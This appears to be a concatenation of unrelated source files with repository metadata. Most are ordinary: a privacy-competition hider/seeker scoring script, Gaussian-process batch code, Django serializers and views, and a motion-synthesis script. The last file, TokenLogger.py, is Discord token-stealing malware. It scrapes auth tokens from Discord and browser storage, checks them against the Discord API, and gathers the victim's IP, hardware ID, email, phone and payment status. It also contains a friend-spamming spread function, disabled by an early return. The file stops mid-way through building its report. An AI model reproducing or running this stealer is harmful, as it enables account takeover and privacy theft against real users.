# See, for example: https://github.com/NVIDIA/framework-determinism
# ============================================== Prepare directories. ==============================================
# Code directory.
code_dir = os.path.abspath(".")
if not os.path.exists(code_dir):
raise ValueError(f"Code directory not found at {code_dir}.")
print(f"\nCode directory:\t\t{code_dir}")
# Data path.
data_path = os.path.abspath(args.data_path)
if not os.path.exists(data_path):
raise ValueError(f"Data file not found at {data_path}.")
print(f"Data file:\t\t{data_path}")
data_dir = os.path.dirname(data_path)
data_file_name = os.path.basename(data_path)
# Output directories.
out_dir = os.path.abspath(args.output_dir)
if not os.path.exists(out_dir):
os.makedirs(out_dir, exist_ok=True)
print(f"Output directory:\t{out_dir}")
hider_dir = os.path.join(out_dir, "hider")
if os.path.exists(hider_dir):
shutil.rmtree(hider_dir)
os.makedirs(hider_dir, exist_ok=True)
seeker_dir = os.path.join(out_dir, "seeker")
if os.path.exists(seeker_dir):
shutil.rmtree(seeker_dir)
os.makedirs(seeker_dir, exist_ok=True)
print(f" ├ Hider output:\t{hider_dir}")
print(f" └ Seeker output:\t{seeker_dir}\n")
# =================================================== Load data. ===================================================
if args.debug_data <= 0:
args.debug_data = False
with in_progress("Preprocessing and loading data"):
original_data, original_padding_mask, train_idx, test_idx = load_data(
data_dir=data_dir,
data_file_name=data_file_name,
max_seq_len=args.max_seq_len,
seed=args.seed,
train_rate=args.train_frac,
force_reprocess=True, # If True, re-preprocess data every time (rather than reusing).
debug_data=args.debug_data,
)
print(f"\nOriginal data preview (original_data[:2, -10:, :2]):\n{original_data[:2, -10:, :2]}\n")
# ================================================= Part I: Hider. =================================================
# Set up hider input.
original_data_train = original_data[train_idx]
original_padding_mask_train = original_padding_mask[train_idx]
hider_input = {"data": original_data_train, "seed": args.seed, "padding_mask": original_padding_mask_train}
# Run hider.
with in_progress("Running Hider"):
hider_output = hider_module.hider(hider_input)
generated_data, generated_data_padding_mask = parse_hider_output(hider_output)
print(f"\nGenerated data preview (generated_data[:2, -10:, :2]):\n{generated_data[:2, -10:, :2]}\n")
# Save hider output.
hider_output_file = os.path.join(hider_dir, "data.npz")
np.savez(
hider_output_file,
generated_data=generated_data,
padding_mask=generated_data_padding_mask if generated_data_padding_mask is not None else [],
)
# Evaluate hider.
# - Prepare data
if not (args.skip_fp and args.skip_osa):
with in_progress("Preparing data for hider evaluation"):
generated_data, generated_data_padding_mask = load_generated_data(hider_output_file)
_, original_data_train_imputed = prp.preprocess_data(original_data_train, original_padding_mask_train)
_, generated_data_imputed = prp.preprocess_data(generated_data, generated_data_padding_mask)
_, original_data_test_imputed = prp.preprocess_data(
original_data[test_idx], original_padding_mask[test_idx]
)
# - Feature prediction step.
if not args.skip_fp:
num_features = original_data_train.shape[2]
with temp_seed_numpy(args.seed):
feature_idx = np.random.permutation(num_features)[: args.feature_prediction_no]
print(f"\nFeature prediction evaluation on IDs: {feature_idx}\n")
with in_progress("Running feature prediction"):
with in_progress("Running on [original data]"):
with tf_fixed_seed_seesion(args.seed):
original_feature_prediction_accuracy, ori_task_types = feature_prediction(
train_data=original_data_train_imputed,
test_data=original_data_test_imputed,
index=feature_idx,
verbose=args.eval_verbose,
)
with in_progress("Running on [generated data]"):
with tf_fixed_seed_seesion(args.seed):
new_feature_prediction_accuracy, new_task_types = feature_prediction(
train_data=generated_data_imputed,
test_data=original_data_test_imputed,
index=feature_idx,
verbose=args.eval_verbose,
)
print("\nFeature prediction errors (per feature):")
print(f"Original data:\t\t{original_feature_prediction_accuracy}")
print(f"New (hider-generated):\t{new_feature_prediction_accuracy}\n")
# - Save results.
with open(os.path.join(hider_dir, "feature_prediction_scores.txt"), "w") as f:
for score in new_feature_prediction_accuracy:
print(score.astype(str), file=f)
else:
print(f"Feature prediction step skipped!{ '' if tf115_found else ' (TensorFlow 1.15 not found)' }\n")
# - One-step-ahead prediction step.
if not args.skip_osa:
with in_progress("Running one-step-ahead prediction"):
with in_progress("Running on [original data]"):
with tf_fixed_seed_seesion(args.seed):
original_osa_perf = one_step_ahead_prediction(
train_data=original_data_train_imputed,
test_data=original_data_test_imputed,
verbose=args.eval_verbose,
)
with in_progress("Running on [generated data]"):
with tf_fixed_seed_seesion(args.seed):
new_osa_perf = one_step_ahead_prediction(
train_data=generated_data_imputed,
test_data=original_data_test_imputed,
verbose=args.eval_verbose,
)
print("\nOne-step-ahead prediction errors (per feature):")
print(f"Original data:\t\t{original_osa_perf}")
print(f"New (hider-generated):\t{new_osa_perf}\n")
# - Save results.
with open(os.path.join(hider_dir, "osa_score.txt"), "w") as f:
print(new_osa_perf.astype(str), file=f)
else:
print(f"One-step-ahead prediction step skipped!{ '' if tf115_found else ' (TensorFlow 1.15 not found)' }\n")
if not args.skip_fp and not args.skip_osa:
passed = benchmark_hider(
feat_scores=new_feature_prediction_accuracy,
task_types=new_task_types,
osa_score=new_osa_perf,
eval_feat_scores=original_feature_prediction_accuracy,
eval_task_types=ori_task_types,
eval_osa_score=original_osa_perf,
threshold_auroc=0.85,
threshold_rmse=5.00,
)
print(f'>>> Hider evaluation: {"passed" if passed else "failed"}')
# Validation of hider results:
validate_hider_output(
hider="hider from hider.py",
hider_dir=hider_dir,
features=feature_idx if not args.skip_fp else None,
data_shape=original_data_train.shape,
raise_exception=True,
skip_fp=args.skip_fp,
skip_osa=args.skip_osa,
)
# ======================================= Part II: Seeker (vs Part I Hider). =======================================
# Set up seeker input.
seeker_input = {
"generated_data": generated_data,
"enlarged_data": original_data,
"seed": args.seed,
"generated_data_padding_mask": generated_data_padding_mask,
"enlarged_data_padding_mask": original_padding_mask,
}
# Run seeker.
with in_progress("Running Seeker"):
reidentified_labels = seeker_module.seeker(seeker_input)
# Save seeker output.
seeker_output_file = os.path.join(seeker_dir, "data.npz")
np.savez(seeker_output_file, reidentified_data=reidentified_labels)
# Evaluate seeker (vs hider).
true_labels = np.isin(np.arange(original_data.shape[0]), train_idx)
reidentified_labels = validate_seeker_output(
seeker="seeker from seeker.py", seeker_output_path=seeker_output_file, labels=true_labels, raise_exception=True
)
reidentification_score = reidentify_score(true_labels, reidentified_labels)
print(f"\nTrue labels:\t\t\t\t{true_labels.astype(int)}")
print(f"Reidentified (by seeker) labels:\t{reidentified_labels}")
print(f"Reidentification score:\t\t\t{reidentification_score:.4f}\n")
if __name__ == "__main__":
# Inputs for the main function
parser = argparse.ArgumentParser(
description="A script that emulates the competition's scoring process, "
"the hider (from hider.py) is run against the seeker (from seeker.py)."
)
parser.add_argument(
"-d",
"--data_path",
metavar="PATH",
default="./data/train_longitudinal_data.csv",
type=str,
help="Data file path (Amsterdam dataset). Defaults to './data/train_longitudinal_data.csv'.",
)
parser.add_argument(
"-o",
"--output_dir",
metavar="PATH",
default="./output",
type=str,
help="Output directory. Defaults to './output'.",
)
parser.add_argument(
"-m", "--max_seq_len", metavar="INT", default=100, type=int, help="Max sequence length limit. Defaults to 100."
)
parser.add_argument(
"-t", "--train_frac", default=0.5, metavar="FLOAT", type=float, help="Training set fraction. Defaults to 0.5."
)
parser.add_argument(
"-e",
"--hider_eval_threshold",
default=0.85,
metavar="FLOAT",
type=float,
help="Hider evaluation threshold. Defaults to 0.85.",
)
parser.add_argument(
"-f",
"--feature_prediction_no",
metavar="INT",
default=5,
type=int,
help="Number of features in the subset of features used to run feature prediction "
"(part of hider evaluation). Defaults to 5.",
)
parser.add_argument("-s", "--seed", metavar="INT", default=0, type=int, help="Random seed. Defaults to 0.")
parser.add_argument(
"-g",
"--debug_data",
metavar="INT",
default=0,
type=int,
help="Set this to a non-0 value to use a 'debug' subset of the dataset instead of the whole dataset "
"(useful for speedy debugging), only the first --debug_data many rows of the data file will be loaded. "
"Defaults to 0.",
)
parser.add_argument(
"--skip_fp", action="store_true", default=False, help="Skip feature prediction step of hider evaluation if set."
)
parser.add_argument(
"--skip_osa",
action="store_true",
default=False,
help="Skip one-step-ahead prediction step of hider evaluation if set.",
)
parser.add_argument(
"--eval_verbose",
action="store_true",
default=False,
help="If set, the underlying training in hider evaluation stages will be shown verbosely "
"(training epoch etc.).",
)
parsed_args = parser.parse_args()
# Call main function
main(parsed_args)
|
[
"wangziqi000@126.com"
] |
wangziqi000@126.com
|
3d0fae30bd982b8f9f658f48d051db3fde318b8c
|
1d503f37def0928bcb7d1b2b9a9135656b47107b
|
/excursion/active_learning/batch.py
|
c88dc846528d9e44b38a34fa965a535268a3774f
|
[
"Apache-2.0"
] |
permissive
|
Abdoelabassi/excursion
|
6fda40b9bc712ff75cf77ad2daa75d15634da754
|
c5a5c6d882b8dd1008fbabf1a3b81eaba382bef6
|
refs/heads/master
| 2023-07-30T19:50:24.667513
| 2021-07-08T09:48:47
| 2021-07-08T09:48:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,462
|
py
|
import torch
import gpytorch
import os
import itertools
from excursion import get_gp, fit_hyperparams
from copy import deepcopy
class batchGrid(object):
"""
A class to represent the underlying grid with useful features for batch point selection
...
Attributes
-----------
batch_types : dict()
grid : torch.Tensor
the acquisition values for each point in the grid
device : str
device to choose grom gou or cpu
picked_indexs list
list to keep track of the indices already selected for query or the batch
_ndims : int
dimension of the grid
Methods
-------
pop(index)
Removes index from to avoid being picked again
update(acq_value_grid)
Actualize the elements of the acquisition values for the same grid
"""
def __init__(self, acq_values_of_grid, device, dtype, n_dims):
self.grid = torch.as_tensor(acq_values_of_grid, device=device, dtype=dtype)
self.batch_types = {
"Naive": self.get_naive_batch,
"KB": self.get_kb_batch,
"Distanced": self.get_distanced_batch,
# "Cluster": self.get_cluster_batch,
}
self.picked_indexs = []
self._n_dims = n_dims
self.device = device
self.dtype = dtype
def __torch_function__(self, func, types, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
args = [a._t if hasattr(a, "_t") else a for a in args]
ret = func(*args, **kwargs)
return batchgrid(ret, kwargs["device"], kwargs["dtype"])
def pop(self, index):
self.grid[index] = torch.Tensor([(-1.0) * float("Inf")])
def update(self, acq_values_of_grid, device, dtype):
self.grid = torch.as_tensor(acq_values_of_grid, device=device, dtype=dtype)
def get_first_max_index(self, gp, testcase, device, dtype):
X_train = gp.train_inputs[0].to(device, dtype)
new_index = torch.argmax(self.grid)
new_x = testcase.X.to(device, dtype)[new_index]
# if the index is not already picked nor in the training set
# accept it ans remove from future picks
if (new_index not in self.picked_indexs) and (
new_x.tolist() not in X_train.tolist()
):
self.pop(new_index)
self.picked_indexs.append(new_index.item())
return new_index.item()
else:
self.pop(new_index)
return self.get_first_max_index(gp, testcase, device, dtype)
def get_naive_batch(self, gp, testcase, batchsize, device, dtype, **kwargs):
new_indexs = []
while len(new_indexs) < batchsize:
max_index = self.get_first_max_index(gp, testcase, device, dtype)
if max_index not in new_indexs:
new_indexs.append(max_index)
self.pop(max_index)
else:
self.pop(max_index)
max_index = self.get_first_max_index(gp, testcase, device, dtype)
return new_indexs
def get_kb_batch(self, gp, testcase, batchsize, device, dtype, **kwargs):
X_train = gp.train_inputs[0].to(device, dtype)
new_indexs = []
fake_x_list = torch.Tensor([]).to(device, dtype)
fake_y_list = torch.Tensor([]).to(device, dtype)
likelihood = kwargs["likelihood"]
algorithmopts = kwargs["algorithmopts"]
excursion_estimator = kwargs["excursion_estimator"]
gp_fake = deepcopy(gp)
while len(new_indexs) < batchsize:
max_index = self.get_first_max_index(gp, testcase, device, dtype)
if max_index not in new_indexs:
new_indexs.append(max_index)
self.pop(max_index)
fake_x = testcase.X.to(device, dtype)[max_index].reshape(1, -1)
fake_x_list = torch.cat((fake_x_list, fake_x), 0)
gp_fake.eval()
likelihood.eval()
fake_y = likelihood(gp_fake(fake_x)).mean
fake_y_list = torch.cat((fake_y_list, fake_y), 0)
# print('******* train_targets', gp_fake.train_targets.dim(), gp_fake.train_targets)
# print('******* model_batch_sample ', len(gp_fake.train_inputs[0].shape[:-2]))
gp_fake = gp_fake.get_fantasy_model(
fake_x_list, fake_y_list, noise=likelihood.noise
)
# gp_fake = self.update_fake_posterior(
# testcase,
# algorithmopts,
# gp_fake,
# likelihood,
# fake_x_list,
# fake_y_list,
# )
new_acq_values = excursion_estimator.get_acq_values(gp_fake, testcase)
self.update(new_acq_values, device, dtype)
else:
self.pop(max_index)
max_index = self.get_first_max_index(gp_fake, testcase, device, dtype)
return new_indexs
def update_fake_posterior(
self,
testcase,
algorithmopts,
model_fake,
likelihood,
list_fake_xs,
list_fake_ys,
):
with torch.autograd.set_detect_anomaly(True):
if self._n_dims == 1:
# calculate new fake training data
inputs = torch.cat(
(model_fake.train_inputs[0], list_fake_xs), 0
).flatten()
targets = torch.cat(
(model_fake.train_targets.flatten(), list_fake_ys.flatten()), dim=0
).flatten()
else:
inputs = torch.cat((model_fake.train_inputs[0], list_xs), 0)
targets = torch.cat(
(model_fake.train_targets, list_fake_ys), 0
).flatten()
model_fake.set_train_data(inputs=inputs, targets=targets, strict=False)
model_fake = get_gp(
inputs, targets, likelihood, algorithmopts, testcase, self.device
)
likelihood.train()
model_fake.train()
fit_hyperparams(model_fake, likelihood)
return model_fake
def euclidean_distance_idxs(self, array_idxs, point_idx, testcase):
array = testcase.X[array_idxs]
point = testcase.X[point_idx] #vector
d = array - point
d = torch.sqrt(torch.sum(d**2)) #vector
d = torch.min(d).item() #USE DIST
if(array_idxs == []):
return 1e8
else:
return d #returns a scalar
def get_distanced_batch(self, gp, testcase, batchsize, device, dtype, **kwargs):
new_indexs = []
#c times the minimum grid step of separation between selected points in batch
c = 75 #has to be > 1
step = min((testcase.rangedef[:,1] - testcase.rangedef[:,0])/testcase.rangedef[:,-1])
distance = c * step
while len(new_indexs) < batchsize:
max_index = self.get_first_max_index(gp, testcase, device, dtype)
if max_index not in new_indexs:
if self.euclidean_distance_idxs(new_indexs, max_index, testcase) >= distance:
new_indexs.append(max_index)
self.pop(max_index)
else:
self.pop(max_index)
max_index = self.get_first_max_index(gp, testcase, device, dtype)
return new_indexs
|
[
"iem244@nyu.edu"
] |
iem244@nyu.edu
|
7b18809d8ce5dfbde4187a70139483aba4117748
|
ce35645d42d468420bcc06208dca10005d1ff4b8
|
/HomeWork2/Task1.py
|
9b21a631d1fc93a020f9ca4d7f4b4fab148acd1c
|
[] |
no_license
|
abulashvili27/G-25
|
73b07f8f17f46d1db8e54fc63713891da8bc2f4c
|
d569c93accf6f9321583a667dcdf3f918f909b08
|
refs/heads/main
| 2023-04-28T19:18:41.836180
| 2021-05-14T11:44:48
| 2021-05-14T11:44:48
| 348,733,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
first_book_name = "The Knight in the Panther's Skin"
first_book_authot = "Shota Rustaveli"
first_book_year = "XII century"
first_book_pages = "222"
second_book_name = "The Right Hand of the Grand Master"
second_book_author = "Konstantine Gamsakhurdia"
second_book_year = "1939"
second_book_pages = "397"
third_book_name = "Antonio and David"
third_book_author = "Jemal Karchkhadze"
third_book_year = "1987"
third_book_pages = "134"
class Book:
def __init__(self, name, author, year, pages):
self.name = name
self.author = author
self.year = year
self.pages = pages
def info(self):
return f"Name - {self.name} , Author - {self.author}, Year - {self.year}, Pages - {self.pages}"
print("1) The Knight in the Panther's Skin \n2) The Right Hand of the Grand Master \n3) Antonio and David")
user_input = int(input("Choose book: "))
if user_input == 1:
b = Book(first_book_name, first_book_authot, first_book_year, first_book_pages)
print(b.info())
elif user_input == 2:
b = Book(second_book_name, second_book_author, second_book_year, second_book_pages)
print(b.info())
elif user_input == 3:
b = Book(third_book_name, third_book_author, third_book_year, third_book_pages)
print(b.info())
else:
print("Book didn't find")
|
[
"davit.abulashvili.1@btu.edu.ge"
] |
davit.abulashvili.1@btu.edu.ge
|
3a3649075ac12b193692404f553014dccd4d8a43
|
6d17b9e5868cb5d8febc31acdb2e1d460277e97b
|
/PostsRestApi/serializers.py
|
53aa53dc5b770c484ff708e8339ae5aa53ad6192
|
[] |
no_license
|
jpassgo/PostsApi
|
984a8f251b27a89284efa37e3666730a6583cdd3
|
c5309e0b1fd39be510089568d8a1583d44b43813
|
refs/heads/main
| 2022-12-30T13:17:49.684661
| 2020-10-20T20:40:52
| 2020-10-20T20:40:52
| 303,567,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
from rest_framework import serializers
from talk.models import post
class PostSerializer(serializers.ModelSerializer):
class Meta:
model = Post
fields = ('id', 'author', 'text', 'created', 'updated')
|
[
"jeffpascoe9@gmail.com"
] |
jeffpascoe9@gmail.com
|
68daa432013b8807742a5523d291653409e0d47b
|
f979d449c514b8ceb564d78e6d611ac69e782e9e
|
/synthesis_scripts/randomly_generating_sequences.py
|
67f24e804efc435ad9943f7420bca3aff9c19c1c
|
[] |
no_license
|
lucaskingjade/Motion_Synthesis_Adversarial_Learning
|
4de51fe2a5f1f016081883fcdff400d1a990c8f1
|
bf9d4d7a2763d80302ecc4c5a894f169106f79fd
|
refs/heads/master
| 2020-03-24T00:44:20.832630
| 2019-02-20T14:02:39
| 2019-02-20T14:02:39
| 142,305,689
| 8
| 1
| null | 2019-02-19T13:15:07
| 2018-07-25T13:42:52
|
Python
|
UTF-8
|
Python
| false
| false
| 3,813
|
py
|
#This is used for randomly generating long sequences.
#1. reconstruct a sequence but using a different labels
import numpy as np
import os
from keras.models import model_from_yaml, Model
from Seq_AAE_V1.models.Seq_AAE.seq_aae_new_loss import *
from keras.layers import Input,RepeatVector,LSTM,SimpleRNN
def Decoder(latent_dim,max_len,hidden_dim_dec_list,activation_dec_list,dof):
latent_input = Input(shape=(latent_dim,), name='latent_input')
latent_input_seq = RepeatVector(max_len)(latent_input)
decoded = latent_input_seq
for i, (dim, activation) in enumerate(zip(hidden_dim_dec_list, activation_dec_list)):
decoded = LSTM(output_dim=dim, activation=activation, return_sequences=True)(decoded)
decoded = SimpleRNN(output_dim=dof, activation='sigmoid', name='decoder_output', return_sequences=True)(
decoded)
return Model(input=latent_input, output=decoded, name='Decoder')
if __name__=='__main__':
import argparse
paser = argparse.ArgumentParser()
paser.add_argument('--which_epoch',default=200,type=int)
paser.add_argument('--nb_test', default=100, type=int)
paser.add_argument('--which_activity', default=0, type=int)
args = paser.parse_args()
root_path = os.getenv('Seq_AAE_V1')
path_model =root_path +'Training/Seq_AAE/Expr_Emilya/exp2310/expr001/'
encoder_name='encoder'+str(args.which_epoch)
with open(path_model+encoder_name+'.yaml','r') as f:
encoder = model_from_yaml(f)
encoder.load_weights(path_model+encoder_name+'.h5')
##load some walking data from dataset
from Seq_AAE_V1.datasets.dataset import Emilya_Dataset
dataset_obj = Emilya_Dataset(window_width=200, shift_step=20,
sampling_interval=None,
with_velocity=False,
number=2, nb_valid=2, nb_test=args.nb_test)
X = dataset_obj.test_X[:,:,1:]
Y1 = dataset_obj.test_Y1
Y2 = dataset_obj.test_Y2
# only choose 'walking' activity
indices = np.where(Y1 == args.which_activity)[0]
X = X[indices]
Y1 = Y1[indices]
Y2 = Y2[indices]
max_vector = dataset_obj.max_vector[1:]
min_vector = dataset_obj.min_vector[1:]
# get the latent codes using its true emotion label
latent_codes = encoder.predict(x=X, batch_size=100)
#define decoder model
SAAE = Sequence_Adversrial_Autoencoder_with_New_Loss(latent_dim=50,latent_activation='tanh',
hidden_dim_enc_list=[100,100],hidden_dim_dec_list=[100,100],
activation_enc_list=['tanh','tanh'],activation_dec_list=['tanh','tanh'])
SAAE.nb_label =8
SAAE.max_len = 1000
SAAE.dof = 69
SAAE.postprocess = dataset_obj.postprocess
SAAE.sampling_interval = dataset_obj.sampling_interval
SAAE.save_generated_seqs(X, max_vector=max_vector, min_vector=min_vector,
suffix='true_seq_activity' + str(args.which_activity))
# decoder = Decoder(latent_dim=50,max_len=500,
# hidden_dim_dec_list=[100,100],activation_dec_list=['tanh','tanh'],dof=69)
#
# #Emotion_name = ['Anger', 'Anxiety', 'Joy', 'Neutral', 'Panic Fear', 'Pride', 'Sadness', 'Shame']
#
# #load decoder
# decoder_name = 'de'+encoder_name[2:]
# # with open(path_model+decoder_name+'.yaml','r') as f:
# # decoder = model_from_yaml(f)
# decoder.load_weights(path_model+decoder_name+'.h5')
# latent_codes = latent_codes*1.0+np.random.normal(size=latent_codes.shape,scale=1)*0.
# generated_long_seqs = decoder.predict(x=latent_codes,verbose=0)
# SAAE.save_generated_seqs(generated_long_seqs,max_vector=max_vector,min_vector=min_vector,
# suffix='random_generated_activity'+str(args.which_activity))
|
[
"wangqi531@hotmail.com"
] |
wangqi531@hotmail.com
|
fa1fb078b8bf58633cef5e892c8ca584e598673f
|
9c524827809d2b1fec6da2780ae3aaf51e441e13
|
/test/db_operate.py
|
295975e853e19a4cd17f456f439887207c9402f9
|
[] |
no_license
|
wjfelink/python_test
|
e303c513fe9cc684759ac0abfb7349547f15bff5
|
6cfdce9eedffe9ed3b2b9b9b2b2320144d00b922
|
refs/heads/master
| 2021-01-10T02:22:24.179968
| 2016-03-24T10:08:56
| 2016-03-24T10:08:56
| 53,390,781
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,148
|
py
|
__author__ = 'user'
# -*- coding:utf-8 -*-
import PyMysql_db as sqldb
#result_master_order_create
def getDiffData(table_name,sqltext1,sqltext2,primary_key='',db1='portal_0224',db2='portal_0304'):
#table_name="master_order"
#sqltext = "select * from master_order where master_order_no='20160324104026882095'"
data = sqldb.getDbData(db=db1,sqltext=sqltext1)
#sqltext = "select * from master_order where master_order_no='20160324104026477003'"
data2 = sqldb.getDbData(db=db2, sqltext=sqltext2)
print data
print data2
with open("result_master_order_create.txt", 'ab+') as result:
result.truncate()
result.write("---------------%s---------------\n"%table_name)
try:
for order in data:
primary_key_value=order[primary_key]
for key in order:
for order2 in data2:
primary_key_value2=order2[primary_key]
if primary_key_value!=primary_key_value2:
continue;
for key2 in order2:
if key == key2:
if (order[key] == order2[key2]):
break
else:
print "0224-%s:"%table_name,key,order[key]
print "0304-%s:"%table_name,key2,order2[key2]
result.write(u"0224-%s: %s %s" % (table_name,key, order[key]), )
result.write(u"\n0304-%s: %s %s\n" % (table_name,key2, order2[key2]))
print "\n"
result.write(u"\n")
except:
print "error"
finally:
result.close()
if __name__ == '__main__':
table_name="order_item"
sqltext1="select * from order_item where fk_master_order_id='47e35de732534ee9846926090230be07'"
sqltext2="select * from order_item where fk_master_order_id='7cee403643714c41b10c96be0ff6fec3'"
primary_key="FK_sales_entry_id"
getDiffData(table_name,sqltext1,sqltext2,primary_key)
|
[
"wangjunfei@ctyun.cn"
] |
wangjunfei@ctyun.cn
|
2f488107c22e8000b07da516b9366295336c7b58
|
fbdb2e6fab72f53a53c931397ed41a2798004ae3
|
/src/data_api/entries/views.py
|
5e5d0ce137187fe7c9f88ec09424ecc0df57f7b4
|
[] |
no_license
|
noodlemangos/NCSU_seniordesign
|
35fb01562f75d854eae5fc6a28ff8afba6a615f1
|
4afaf513a733f3888975a1ca9cb59b27d619e1b5
|
refs/heads/master
| 2020-09-29T00:34:20.424805
| 2019-12-09T15:25:57
| 2019-12-09T15:25:57
| 226,902,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,324
|
py
|
"""
Retrieves and saves entry data objects and displays it as a view / detailed view
Referenced tutorial at: https://codeburst.io/building-an-api-with-django-rest-framework-and-class-based-views-75b369b30396
@author Will james
"""
from django.shortcuts import render
from entries.models import Entry
from rest_framework import generics
from rest_framework.response import Response
from rest_framework.reverse import reverse
from entries.serializers import EntrySerializer
from django.contrib.auth.decorators import login_required
class EntryList(generics.ListCreateAPIView):
"""
EntryList class. Uses DjangoRestFramework generics class to create/save a list view of entry data objects.
"""
queryset = Entry.objects.all()
serializer_class = EntrySerializer
def perform_create(self, serializer):
"""
Saves a new/updated entry into the database.
"""
serializer.save()
class EntryDetail(generics.RetrieveUpdateDestroyAPIView):
"""
EntryDetail class. Uses DjangoRestFramework generics class to retrieve a list entry data objects.
"""
serializer_class = EntrySerializer
def get_queryset(self):
"""
Retrieves all of the entry data objects
:return: All of the entry data objects
"""
return Entry.objects.all()
|
[
"cjchris3@ncsu.edu"
] |
cjchris3@ncsu.edu
|
c460c2a78e7cd626bad8d36a4c26171f6186dc4b
|
7bcbf44e931d1b9bd91fb0e720156ed2d21b6d5b
|
/venv/bin/easy_install-3.6
|
d451d65c0f972a628f96c45f5ec51f608e9bef1a
|
[] |
no_license
|
melisamalala/django-pollingapp
|
0b5e1da240c698bb0a0d4552542268b5cfa5f077
|
95dfb40d36a333827c39995bba4652ce254300c5
|
refs/heads/master
| 2020-03-29T15:25:56.320727
| 2018-10-02T12:02:28
| 2018-10-02T12:02:28
| 150,062,879
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
6
|
#!/Users/melissamalala/PycharmProjects/firstdjangoproject/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
|
[
"melissamalala@gmail.com"
] |
melissamalala@gmail.com
|
f998e42a74441a4003967df75105963ecfe3bf04
|
e009a6e93ced2f308f296ea34b77409fbb27e60f
|
/TokenLogger.py
|
a12bce394def65a1f9a9f22d66c260e528687b03
|
[] |
no_license
|
1714Noodix/TokenLog-PY
|
d003a524720cad90838e44bca34934bf39ec694f
|
884787a7d7438e37c14580c9ca6bded7a5afac37
|
refs/heads/main
| 2023-05-31T05:32:07.545182
| 2021-07-13T11:00:46
| 2021-07-13T11:00:46
| 385,571,143
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,987
|
py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
